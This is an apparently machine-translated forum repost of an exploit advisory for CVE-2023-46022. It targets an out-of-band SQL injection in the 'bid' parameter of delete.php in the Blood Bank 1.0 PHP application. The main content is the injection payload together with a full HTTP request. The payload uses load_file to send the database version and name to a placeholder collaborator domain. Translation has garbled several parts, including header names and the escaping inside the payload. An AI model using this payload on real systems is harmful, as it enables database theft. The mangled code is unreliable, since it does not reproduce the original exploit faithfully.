H

血库1.0-'bid'sqli

HackApt-37 Team已验证会员

黑客倉庫站長

贡献: 83%
#利用标题:血库1.0-'bid'sqli
#日期: 2023-11-15
#利用作者: Ersin Erenler
#供应商homepage3360 https://code-projects.org/blood-bank-in-php-with-with-source-code
#软件link: https://download-media.code-project...n_in_php_with_with_source_source_code.zip.zip
#版本: 1.0
#在: Windows/Linux,Apache 2.4.54,PHP 8.2.0测试
#CVE : CVE-2023-46022
----------------------------------------------------------------------------------------------------------------------------
#Description:
代码项目的/delete.php文件中的“投标”参数v1.0容易受到带外SQL注入的影响。这种漏洞源于保护机制不足,使攻击者可以使用Burp合作者利用参数来发起OOB SQL注入攻击。通过这项技术,攻击者可以从数据库中提取敏感信息。
脆弱的file: /delete.php
参数名称:出价
#概念证明:
--------------------------------------
1。拦截通过Burp Suite取消的请求
2。将有效载荷注入脆弱参数
3。有payload: 3'%2B(select%20load_file(concat('\\\\\',version(),'。'。',database(),'。collaborator-domain-domain \\ a.txt'))%2B'
4。示例请求出价参数:
---
get/bloodbank/file/delete.php?bid=3'%2B(Select%20load_file(concat('' \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
HOST: LOCALHOST
用户代理: Mozilla/5.0(Windows NT 10.0; Win64; X64; rv:109.0)gecko/20100101 Firefox/119.0
ACCEPT:文本/HTML,Application/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,/; q=0.8
Accept-Language: en-us,en; q=0.5
Accept-incoding: Gzip,Deflate,br
连接:关闭
Referer: http://localhost/bloodbank/bloodinfo.php
cookie: phpsessid=某些cookie-value
升级- 不肯定- requests: 1
sec-fetch-Dest:文档
sec-fetch mode:导航
sec-fetch-site:相同原产
sec-fetch-user:1
---
5。数据库和版本信息通过Burp Suite合作者扣押
 
后退
顶部